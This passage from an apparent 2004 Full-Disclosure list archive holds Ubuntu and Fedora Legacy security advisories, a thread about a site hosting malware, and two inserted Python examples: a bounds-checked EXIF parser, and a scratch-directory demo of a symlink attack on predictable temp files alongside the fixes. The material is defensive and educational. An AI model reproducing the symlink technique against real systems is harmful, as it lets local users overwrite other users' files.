    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++6_6.0.2.5-1ubuntu1.1_powerpc.deb
      Size/MD5: 154292 386fca02c1a14d5e5376c1dde3b3cdbb
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick6-dev_6.0.2.5-1ubuntu1.1_powerpc.deb
      Size/MD5: 1659816 15078f23f6626d1ccb01ad6d2f6f58d6
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick6_6.0.2.5-1ubuntu1.1_powerpc.deb
      Size/MD5: 1151174 0d4aa571620cf6c27f6b5deaf392887c
    http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.0.2.5-1ubuntu1.1_powerpc.deb
      Size/MD5: 135840 4b5d9556339726e1cb277abd0c2692f6

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBfvFaDecnbV4Fd/IRAnqkAJ4laSRS+eVWgLbMIX7FM/3P4fbWSwCeOUn5
XfU4xNi939m1hEmpeBXzu3M=
=FE0z
-----END PGP SIGNATURE-----
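The defect class named in this advisory, an EXIF parser trusting offsets and counts read out of the image, is easiest to see in a parser that performs the missing checks. Added example (not ImageMagick's code, and not part of the notice): a minimal reader for the first IFD of a TIFF/EXIF block that validates every offset and length against the buffer before dereferencing it, exercised on a constructed well-formed blob and on a constructed blob whose Make tag claims its string lives far outside the buffer. Tag numbers are the standard TIFF ones; the sample values are made up.

```python
"""Added example (not ImageMagick code): bounds-checked parsing of the
first IFD of a TIFF/EXIF blob. Sample blobs are constructed in build_tiff()."""
import struct

TYPE_SIZE = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8, 7: 1, 9: 4, 10: 8}  # TIFF field types
TAG_MAKE, TAG_IMAGE_WIDTH = 0x010F, 0x0100


class ExifError(ValueError):
    """Raised for any offset, count or length that leaves the buffer."""


def parse_ifd0(data):
    n = len(data)
    if n < 8:
        raise ExifError("header truncated")
    endian = {b"II": "<", b"MM": ">"}.get(data[:2])
    if endian is None:
        raise ExifError("bad byte-order mark")
    magic, ifd_off = struct.unpack(endian + "HI", data[2:8])
    if magic != 42:
        raise ExifError("bad TIFF magic")
    if ifd_off + 2 > n:
        raise ExifError("IFD offset outside buffer")
    (count,) = struct.unpack(endian + "H", data[ifd_off:ifd_off + 2])
    if ifd_off + 2 + 12 * count > n:
        raise ExifError(f"IFD declares {count} entries past end of buffer")
    tags = {}
    for i in range(count):
        base = ifd_off + 2 + 12 * i
        tag, typ, cnt = struct.unpack(endian + "HHI", data[base:base + 8])
        if typ not in TYPE_SIZE:
            raise ExifError(f"tag 0x{tag:04x}: unknown type {typ}")
        total = TYPE_SIZE[typ] * cnt
        if total <= 4:                      # value stored inline in the entry
            raw = data[base + 8:base + 8 + total]
        else:                               # value stored at an offset
            (off,) = struct.unpack(endian + "I", data[base + 8:base + 12])
            if off + total > n:             # the check a vulnerable parser lacks
                raise ExifError(f"tag 0x{tag:04x}: {total} bytes at {off} exceed buffer of {n}")
            raw = data[off:off + total]
        if typ == 2:                        # ASCII, NUL-terminated
            tags[tag] = raw.rstrip(b"\0").decode("ascii", "replace")
        elif typ in (3, 4):                 # SHORT / LONG
            vals = struct.unpack(endian + {3: "H", 4: "I"}[typ] * cnt, raw)
            tags[tag] = vals[0] if cnt == 1 else vals
        else:
            tags[tag] = raw
    return tags


def build_tiff(make_offset=None):
    """Constructed little-endian TIFF: ImageWidth=640 (inline SHORT) and
    Make='Canon' stored out of line. make_offset overrides where the Make
    entry claims its string lives; the default is the honest offset."""
    make = b"Canon\0"
    ifd_off, count = 8, 2
    honest_off = ifd_off + 2 + 12 * count + 4          # just past the next-IFD pointer
    off = honest_off if make_offset is None else make_offset
    entries = struct.pack("<HHII", TAG_IMAGE_WIDTH, 3, 1, 640)
    entries += struct.pack("<HHII", TAG_MAKE, 2, len(make), off)
    return (b"II" + struct.pack("<HI", 42, ifd_off)
            + struct.pack("<H", count) + entries + struct.pack("<I", 0) + make)


def is_rejected(data):
    try:
        parse_ifd0(data)
        return False
    except ExifError:
        return True


if __name__ == "__main__":
    print(parse_ifd0(build_tiff()))
    print("bogus offset rejected:", is_rejected(build_tiff(make_offset=0xFFFFFF00)))
```

In C the same `off + total > n` comparison must be done in a type wide enough not to wrap, or with the subtraction `total > n - off` after checking `off <= n`; Python integers make that detail invisible here.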

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] [USN-3-1] GhostScript utility script vulnerabilities

From: Martin Pitt (martin.pittcanonical.com)
Date: Tue Oct 26 2004 - 19:42:05 CDT


===========================================================
Ubuntu Security Notice USN-3-1 October 27, 2004
GhostScript utility script vulnerabilities
CAN-2004-0967
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

The following packages are affected:

gs-common

The problem can be corrected by upgrading the affected package to
version 0.3.6ubuntu1.1. In general, a standard system upgrade is
sufficient to effect the necessary changes.

Details follow:

Recently, Trustix Secure Linux discovered some vulnerabilities in the
gs-common package. The utilities "pv.sh" and "ps2epsi" created
temporary files in an insecure way, which allowed a symlink attack to
create or overwrite arbitrary files with the privileges of the user
invoking the program.

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/g/gs-common/gs-common_0.3.6ubuntu1.1.dsc
      Size/MD5: 589 3506426ff7ecd78fea5e254dbf694b35
    http://security.ubuntu.com/ubuntu/pool/main/g/gs-common/gs-common_0.3.6ubuntu1.1.tar.gz
      Size/MD5: 31596 060a50ce728aedeb61d6b17be30d2e5d

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/g/gs-common/gs-common_0.3.6ubuntu1.1_all.deb
      Size/MD5: 45434 8ca2afdfe91cd67777f44f767489a705

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBfu7dDecnbV4Fd/IRAn13AKC8Y+5sLv7WnZLnBQXTi9n4tvdk1gCfXwW8
GIq1xF0hK6UcCrd0usdTUwY=
=5w7E
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] [USN-5-1] gettext vulnerabilities

From: Martin Pitt (martin.pittcanonical.com)
Date: Tue Oct 26 2004 - 19:45:55 CDT


===========================================================
Ubuntu Security Notice USN-5-1 October 27, 2004
gettext vulnerabilities
CAN-2004-0966
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

The following packages are affected:

gettext

The problem can be corrected by upgrading the affected package to
version 0.14.1-2ubuntu0.1. In general, a standard system upgrade is
sufficient to effect the necessary changes.

Details follow:

Recently, Trustix Secure Linux discovered some vulnerabilities in the
gettext package. The programs "autopoint" and "gettextize" created
temporary files in an insecure way, which allowed a symlink attack to
create or overwrite arbitrary files with the privileges of the user
invoking the program.

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/g/gettext/gettext_0.14.1-2ubuntu0.1.diff.gz
      Size/MD5: 82347 e172d137c397dc88ca545acebd40b423
    http://security.ubuntu.com/ubuntu/pool/main/g/gettext/gettext_0.14.1-2ubuntu0.1.dsc
      Size/MD5: 789 d273a3e94446d89f603d16ed9587d00b
    http://security.ubuntu.com/ubuntu/pool/main/g/gettext/gettext_0.14.1.orig.tar.gz
      Size/MD5: 6550874 78f4b862510beb2e5d43223dd610e77d

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/g/gettext/gettext-doc_0.14.1-2ubuntu0.1_all.deb
      Size/MD5: 638924 610bd9c00f7971f9d359f7a3902db2e4
    http://security.ubuntu.com/ubuntu/pool/main/g/gettext/gettext-el_0.14.1-2ubuntu0.1_all.deb
      Size/MD5: 45340 cf1fc64a65b38622fdbd29e63b538b69

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/g/gettext/gettext-base_0.14.1-2ubuntu0.1_amd64.deb
      Size/MD5: 92890 581e614d3c390a0b0c4b52752e03cf75
    http://security.ubuntu.com/ubuntu/pool/main/g/gettext/gettext_0.14.1-2ubuntu0.1_amd64.deb
      Size/MD5: 1576278 a3240029c897fcfac68be7eda1f638bb

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/g/gettext/gettext-base_0.14.1-2ubuntu0.1_i386.deb
      Size/MD5: 91066 df2857a4dd7be300743c4e8ec7990997
    http://security.ubuntu.com/ubuntu/pool/main/g/gettext/gettext_0.14.1-2ubuntu0.1_i386.deb
      Size/MD5: 1549186 d16f720d7ef6e031afab70263394c70a

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/g/gettext/gettext-base_0.14.1-2ubuntu0.1_powerpc.deb
      Size/MD5: 94174 9f849ed93f64d80fe669603b581b9df3
    http://security.ubuntu.com/ubuntu/pool/main/g/gettext/gettext_0.14.1-2ubuntu0.1_powerpc.deb
      Size/MD5: 1590102 cba3d457ded8697c018b3e3ac6853f94

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBfu/DDecnbV4Fd/IRAq4+AJ9LTRY8swzj377mKIHs1qct5/gyzgCeOsrr
+38D1w4un36PM4Gb6yEtP5I=
=nFLJ
-----END PGP SIGNATURE-----
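USN-3-1 above and this notice describe the same defect class: a helper script writes to a predictable name under /tmp, and a local user who pre-creates that name as a symlink redirects the write onto any file the invoking user can write. Added example (not from the advisories, whose affected programs are shell scripts): the unsafe pattern beside two fixes, run against a scratch directory in Python; the victim file, the planted link and the PID-style name are constructed for the demonstration.

```python
"""Added example (not from the advisory): insecure temporary file creation
beside two safe variants. The victim file, the 'planted' link and the
predictable name are constructed inside a scratch directory."""
import os
import tempfile


def insecure_write(path, data):
    """The pre-fix pattern: open() on a predictable name follows whatever
    is already there, so a planted symlink redirects the write."""
    with open(path, "w") as fh:
        fh.write(data)


def create_exclusive(path):
    """Fixed name, but O_CREAT|O_EXCL (plus O_NOFOLLOW where available)
    fails if anything, including a symlink, already exists at the path."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    try:
        return os.open(path, flags, 0o600)
    except FileExistsError:
        return None


def create_unpredictable(directory, data):
    """Preferred fix: mkstemp picks a random name and opens it exclusively
    with mode 0600, so there is no name for an attacker to plant in advance."""
    fd, path = tempfile.mkstemp(dir=directory)
    with os.fdopen(fd, "w") as fh:
        fh.write(data)
    return path


def demo(workdir=None):
    workdir = workdir or tempfile.mkdtemp()
    victim = os.path.join(workdir, "victim.txt")
    with open(victim, "w") as fh:
        fh.write("original\n")
    # Constructed predictable name of the kind a PID-based script would use.
    predictable = os.path.join(workdir, "ps2epsi.1234")
    os.symlink(victim, predictable)      # stands in for the planted link

    insecure_write(predictable, "clobbered\n")
    with open(victim) as fh:
        victim_after = fh.read()          # the write landed on victim.txt

    fd = create_exclusive(predictable)   # None: path already exists, refused
    if fd is not None:
        os.close(fd)
    safe_path = create_unpredictable(workdir, "scratch\n")
    return {
        "victim_after_insecure": victim_after,
        "exclusive_refused": fd is None,
        "safe_is_regular_file": os.path.isfile(safe_path) and not os.path.islink(safe_path),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v!r}")
```

The shell equivalent of `create_unpredictable` is `mktemp`, which is what such scripts are normally changed to use; the exclusive-open variant matters when the name must stay fixed for another program to find.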

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] [USN-8-1] gaim vulnerabilities

From: Martin Pitt (martin.pittcanonical.com)
Date: Tue Oct 26 2004 - 19:53:22 CDT


===========================================================
Ubuntu Security Notice USN-8-1 October 27, 2004
gaim vulnerabilities
CAN-2004-0891
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

The following packages are affected:

gaim

The problem can be corrected by upgrading the affected package to
version 1:1.0.0-1ubuntu1.1. In general, a standard system upgrade is
sufficient to effect the necessary changes.

Details follow:

A buffer overflow and two remote crashes were recently discovered in
gaim's MSN protocol handler. An attacker could potentially execute
arbitrary code with the user's privileges by crafting and sending a
particular MSN message.

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.0.0-1ubuntu1.1.diff.gz
      Size/MD5: 40716 a1cd244a1d9197c9a4855706f857ede2
    http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.0.0-1ubuntu1.1.dsc
      Size/MD5: 853 dbd5a82e0fa2c33df8fc26d636a2f9f1
    http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.0.0.orig.tar.gz
      Size/MD5: 6985979 7dde686aace751a49dce734fd0cb7ace

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.0.0-1ubuntu1.1_amd64.deb
      Size/MD5: 3443672 0a2a22b071c0256a2d68d20b474fdddc

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.0.0-1ubuntu1.1_i386.deb
      Size/MD5: 3353616 1b825ce8a2cbba5fa2171fa089f71112

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.0.0-1ubuntu1.1_powerpc.deb
      Size/MD5: 3417684 bae36e86bcf49722af6497d55a2de5fc

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBfvGCDecnbV4Fd/IRAr3eAJ9EkWwjOmcrhPFDxRCO+iB6Jj8sLQCgsQsa
xOYdKjDCqSd1EO9f+IfaT8Y=
=Bf36
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [SPAM] Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild

From: Hugo van der Kooij (hvdkooijvanderkooij.org)
Date: Wed Oct 27 2004 - 01:05:44 CDT


On Wed, 27 Oct 2004, Elia Florio wrote:

> There are a lot of backdoors/trojans ready to install, and the bad news is that
> most of this malware is recompiled, so many AVs are fooled and don't catch them
> (for example Symantec and ClamAV don't recognize much of the malware
> on this site, after a quick test made with www.virustotal.com)

If you have some time, could you assist the clamav team and send them a
detailed report with your findings and the undetected code bits?

They will appreciate your cooperation in this.

Hugo.

--
        I hate duplicates. Just reply to the relevant mailinglist.
        hvdkooijvanderkooij.org http://hvdkooij.xs4all.nl/
                Don't meddle in the affairs of magicians,
                for they are subtle and quick to anger.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild

From: Elia Florio (eflorioedmaster.it)
Date: Wed Oct 27 2004 - 05:17:08 CDT


>> (for example Symantec and ClamAV don't recognize much of the malware
>> on this site, after a quick test made with www.virustotal.com)
>
> If you have some time, could you assist the clamav team and send them a
> detailed report with your findings and the undetected code bits?
>
> They will appreciate your cooperation in this.
>
> Hugo.

Of course, I'd like to support the Clam team....they're working
hard on a valuable open-source AV and I appreciate this too!
I can send them my reports (extracted from virustotal.com) and
the undetected files (exe, dll, class, javascript, html) with
malware/trojans and exploits taken from "xpire.info".

Where do I send this archive? What's the mail address?
Must I use a PGP key or simply a password-protected zip?

EF

________________________________________________
Message sent from
Edizioni Master Webmail
http://mbox.edmaster.it

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] [FLSA-2004:2089] Updated mozilla packages fix security vulnerabilities

From: Dominic Hargreaves (domearth.li)
Date: Wed Oct 27 2004 - 04:17:53 CDT


-----------------------------------------------------------------------
               Fedora Legacy Update Advisory

Synopsis: Updated mozilla resolves security vulnerabilities
Advisory ID: FLSA:2089
Issue date: 2004-10-27
Product: Red Hat Linux
Product: Fedora Core
Keywords: Security
Cross references: https://bugzilla.fedora.us/show_bug.cgi?id=2089
CVE Names: CAN-2003-0564, CAN-2004-0191, CAN-2003-0594,
                   CAN-2004-0722, CAN-2004-0597, CAN-2004-0599,
                   CAN-2004-0757, CAN-2004-0758, CAN-2004-0759,
                   CAN-2004-0760, CAN-2004-0718, CAN-2004-0761,
                   CAN-2004-0762, CAN-2004-0763, CAN-2004-0764,
                   CAN-2004-0765, CAN-2004-0905, CAN-2004-0904,
                   CAN-2004-0903, CAN-2004-0908, CAN-2004-0902
-----------------------------------------------------------------------

-----------------------------------------------------------------------
1. Topic:

Updated mozilla, galeon and epiphany packages that fix multiple
vulnerabilities are now available.

Mozilla is an open-source Web browser, designed for standards
compliance, performance, and portability.

2. Relevant releases/architectures:

Red Hat Linux 7.3 - i386
Red Hat Linux 9 - i386
Fedora Core 1 - i386

3. Problem description:

Note that some of these issues have already been fixed in Red Hat Linux 9 and
Fedora Core 1. Please refer to previous advisories for details.

NISCC testing of implementations of the S/MIME protocol uncovered a number
of bugs in NSS versions prior to 3.9. The parsing of unexpected ASN.1
constructs within S/MIME data could cause Mozilla to crash or consume large
amounts of memory. A remote attacker could potentially trigger these bugs
by sending a carefully-crafted S/MIME message to a victim. The Common
Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name
CAN-2003-0564 to this issue.

Andreas Sandblad discovered a cross-site scripting issue that affects
various versions of Mozilla. When linking to a new page it is still
possible to interact with the old page before the new page has been
successfully loaded. Any Javascript events will be invoked in the context
of the new page, making cross-site scripting possible if the different
pages belong to different domains. The Common Vulnerabilities and
Exposures project (cve.mitre.org) has assigned the name CAN-2004-0191 to
this issue.

Flaws have been found in the cookie path handling between a number of Web
browsers and servers. The HTTP cookie standard allows a Web server
supplying a cookie to a client to specify a subset of URLs on the origin
server to which the cookie applies. Web servers such as Apache do not
filter returned cookies and assume that the client will only send back
cookies for requests that fall within the server-supplied subset of URLs.
However, by supplying URLs that use path traversal (/../) and character
encoding, it is possible to fool many browsers into sending a cookie to a
path outside of the originally-specified subset. The Common
Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name
CAN-2003-0594 to this issue.

Zen Parse reported improper input validation to the SOAPParameter object
constructor leading to an integer overflow and controllable heap
corruption. Malicious JavaScript could be written to utilize this flaw and
could allow arbitrary code execution. The Common Vulnerabilities and
Exposures project (cve.mitre.org) has assigned the name CAN-2004-0722 to
this issue.

During a source code audit, Chris Evans discovered a buffer overflow and
integer overflows which affect the libpng code inside Mozilla. An attacker
could create a carefully crafted PNG file in such a way that it would cause
Mozilla to crash or execute arbitrary code when the image was viewed.
(CAN-2004-0597, CAN-2004-0599)

Zen Parse reported a flaw in the POP3 capability. A malicious POP3 server
could send a carefully crafted response that would cause a heap overflow
and potentially allow execution of arbitrary code as the user running
Mozilla. (CAN-2004-0757)

Marcel Boesch found a flaw that allows a CA certificate to be imported with
a DN the same as that of the built-in CA root certificates, which can cause
a denial of service to SSL pages, as the malicious certificate is treated
as invalid. (CAN-2004-0758)

Met - Martin Hassman reported a flaw in Mozilla that could allow malicious
Javascript code to upload local files from a user's machine without
requiring confirmation. (CAN-2004-0759)

Mindlock Security reported a flaw in ftp URI handling. By using a NULL
character (%00) in an ftp URI, Mozilla can be confused into opening a
resource as a different MIME type. (CAN-2004-0760)

Mozilla does not properly prevent a frame in one domain from injecting
content into a frame that belongs to another domain, which facilitates
website spoofing and other attacks, also known as the frame injection
vulnerability. (CAN-2004-0718)

Tolga Tarhan reported a flaw that can allow a malicious webpage to use a
redirect sequence to spoof the security lock icon that makes a webpage
appear to be encrypted. (CAN-2004-0761)

Jesse Ruderman reported a security issue that affects a number of browsers
including Mozilla that could allow malicious websites to install arbitrary
extensions by using interactive events to manipulate the XPInstall Security
dialog box. (CAN-2004-0762)

Emmanouel Kellinis discovered a caching flaw in Mozilla which allows
malicious websites to spoof certificates of trusted websites via
redirects and Javascript that uses the "onunload" method. (CAN-2004-0763)

Mozilla allowed malicious websites to hijack the user interface via the
"chrome" flag and XML User Interface Language (XUL) files. (CAN-2004-0764)

The cert_TestHostName function in Mozilla only checks the hostname portion
of a certificate when the hostname portion of the URI is not a fully
qualified domain name (FQDN). This flaw could be used for spoofing if an
attacker had control of machines on a default DNS search path. (CAN-2004-0765)
 
Jesse Ruderman discovered a cross-domain scripting bug in Mozilla. If
a user is tricked into dragging a javascript link into another frame or
page, it becomes possible for an attacker to steal or modify sensitive
information from that site. Additionally, if a user is tricked into
dragging two links in sequence to another window (not frame), it is
possible for the attacker to execute arbitrary commands. The Common
Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name
CAN-2004-0905 to this issue.

Gael Delalleau discovered an integer overflow which affects the BMP
handling code inside Mozilla. An attacker could create a carefully crafted
BMP file in such a way that it would cause Mozilla to crash or execute
arbitrary code when the image is viewed. The Common Vulnerabilities and
Exposures project (cve.mitre.org) has assigned the name CAN-2004-0904 to
this issue.

Georgi Guninski discovered a stack-based buffer overflow in the vCard
display routines. An attacker could create a carefully crafted vCard file
in such a way that it would cause Mozilla to crash or execute arbitrary
code when viewed. The Common Vulnerabilities and Exposures project
(cve.mitre.org) has assigned the name CAN-2004-0903 to this issue.

Wladimir Palant discovered a flaw in the way javascript interacts with
the clipboard. It is possible that an attacker could use malicious
javascript code to steal sensitive data which has been copied into the
clipboard. The Common Vulnerabilities and Exposures project
(cve.mitre.org) has assigned the name CAN-2004-0908 to this issue.

Georgi Guninski discovered a heap based buffer overflow in the "Send
Page" feature. It is possible that an attacker could construct a link in
such a way that a user attempting to forward it could result in a crash or
arbitrary code execution. The Common Vulnerabilities and Exposures project
(cve.mitre.org) has assigned the name CAN-2004-0902 to this issue.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade. Only those
RPMs which are currently installed will be updated. Those RPMs which are
not installed but included in the list will not be updated. Note that you
can also use wildcards (*.rpm) if your current directory *only* contains
the desired RPMs.

Please note that this update is also available via yum and apt. Many
people find this an easier way to apply updates. To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the appropriate
RPMs being upgraded on your system. This assumes that you have yum or
apt-get configured for obtaining Fedora Legacy content. Please visit
http://www.fedoralegacy.org/docs/ for directions on how to configure yum
and apt-get.

5. Bug IDs fixed:

http://bugzilla.fedora.us - 1532 - Mozilla 1.4.2 fixes various vulns
http://bugzilla.fedora.us - 1834 - Mozilla < 1.4.3 multiple flaws
http://bugzilla.fedora.us - 2089 - Mozilla < 1.7.3 multiple flaws

6. RPMs required:

Red Hat Linux 7.3:

SRPM:
http://download.fedoralegacy.org/redhat/7.3/updates/SRPMS/mozilla-1.4.3-0.7.1.legacy.src.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/SRPMS/galeon-1.2.13-0.7.1.legacy.src.rpm

i386:
http://download.fedoralegacy.org/redhat/7.3/updates/i386/mozilla-1.4.3-0.7.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/mozilla-chat-1.4.3-0.7.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/mozilla-devel-1.4.3-0.7.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/mozilla-dom-inspector-1.4.3-0.7.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/mozilla-js-debugger-1.4.3-0.7.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/mozilla-mail-1.4.3-0.7.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/mozilla-nspr-1.4.3-0.7.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/mozilla-nspr-devel-1.4.3-0.7.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/mozilla-nss-1.4.3-0.7.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/mozilla-nss-devel-1.4.3-0.7.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/galeon-1.2.13-0.7.1.legacy.i386.rpm

Red Hat Linux 9:

SRPM:
http://download.fedoralegacy.org/redhat/9/updates/SRPMS/mozilla-1.4.3-0.9.1.legacy.src.rpm
http://download.fedoralegacy.org/redhat/9/updates/SRPMS/galeon-1.2.13-0.9.2.legacy.src.rpm

i386:
http://download.fedoralegacy.org/redhat/9/updates/i386/mozilla-1.4.3-0.9.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/mozilla-chat-1.4.3-0.9.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/mozilla-devel-1.4.3-0.9.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/mozilla-dom-inspector-1.4.3-0.9.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/mozilla-js-debugger-1.4.3-0.9.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/mozilla-mail-1.4.3-0.9.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/mozilla-nspr-1.4.3-0.9.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/mozilla-nspr-devel-1.4.3-0.9.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/mozilla-nss-1.4.3-0.9.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/mozilla-nss-devel-1.4.3-0.9.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/galeon-1.2.13-0.9.2.legacy.i386.rpm

Fedora Core 1:

SRPM:

http://download.fedoralegacy.org/fedora/1/updates/SRPMS/mozilla-1.4.3-1.fc1.1.legacy.src.rpm
http://download.fedoralegacy.org/fedora/1/updates/SRPMS/epiphany-1.0.4-2.4.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/1/updates/i386/mozilla-1.4.3-1.fc1.1.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/mozilla-chat-1.4.3-1.fc1.1.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/mozilla-devel-1.4.3-1.fc1.1.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/mozilla-dom-inspector-1.4.3-1.fc1.1.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/mozilla-js-debugger-1.4.3-1.fc1.1.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/mozilla-mail-1.4.3-1.fc1.1.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/mozilla-nspr-1.4.3-1.fc1.1.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/mozilla-nspr-devel-1.4.3-1.fc1.1.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/mozilla-nss-1.4.3-1.fc1.1.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/mozilla-nss-devel-1.4.3-1.fc1.1.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/epiphany-1.0.4-2.4.legacy.i386.rpm

7. Verification:

SHA1 sum Package Name
---------------------------------------------------------------------------

8b26049e02b8ba752151edbbda3a7ac13550f419 redhat/7.3/updates/SRPMS/mozilla-1.4.3-0.7.1.legacy.src.rpm
d21e84f5b3d17317424b521fe5bb6a1771187532 redhat/7.3/updates/SRPMS/galeon-1.2.13-0.7.1.legacy.src.rpm
367a2c8360f0e8f984a63da7e3e6ccadc692341c redhat/7.3/updates/i386/mozilla-1.4.3-0.7.1.legacy.i386.rpm
3675dc6ec08f513dca4a56b5c26b2632d1d9081e redhat/7.3/updates/i386/mozilla-chat-1.4.3-0.7.1.legacy.i386.rpm
7765e5bf8d219a2337396b65e6983c79a44c9d7b redhat/7.3/updates/i386/mozilla-devel-1.4.3-0.7.1.legacy.i386.rpm
5e363fe99cbad7745de8e93b2420e7281a08c038 redhat/7.3/updates/i386/mozilla-dom-inspector-1.4.3-0.7.1.legacy.i386.rpm
cffefef5b6b67d5e40a4f988503982af9a4cb49b redhat/7.3/updates/i386/mozilla-js-debugger-1.4.3-0.7.1.legacy.i386.rpm
e6d7563bf90f5f6bd4246e2b07097d37ac18e256 redhat/7.3/updates/i386/mozilla-mail-1.4.3-0.7.1.legacy.i386.rpm
e04ab6de0904386e881541234a8604e6283fbd00 redhat/7.3/updates/i386/mozilla-nspr-1.4.3-0.7.1.legacy.i386.rpm
a333e23e084b9d59488db7451b991b3775d3c774 redhat/7.3/updates/i386/mozilla-nspr-devel-1.4.3-0.7.1.legacy.i386.rpm
0611c836e192bed899e30c261e17736c4a5a1b78 redhat/7.3/updates/i386/mozilla-nss-1.4.3-0.7.1.legacy.i386.rpm
04789c2b7516018e0fdbae8c0c24edba98a373b7 redhat/7.3/updates/i386/mozilla-nss-devel-1.4.3-0.7.1.legacy.i386.rpm
14287024fbe57fc555c5e8fa2736d2a708ae2dc6 redhat/7.3/updates/i386/galeon-1.2.13-0.7.1.legacy.i386.rpm

4cba85b2190de4bbd96505a0433cad388e3a2e26 redhat/9/updates/SRPMS/mozilla-1.4.3-0.9.1.legacy.src.rpm
f5cf30105dbec5d0f24270e418141ba556df7db0 redhat/9/updates/SRPMS/galeon-1.2.13-0.9.2.legacy.src.rpm
5623fba5418718a38eb47a334866833d5705f809 redhat/9/updates/i386/mozilla-1.4.3-0.9.1.legacy.i386.rpm
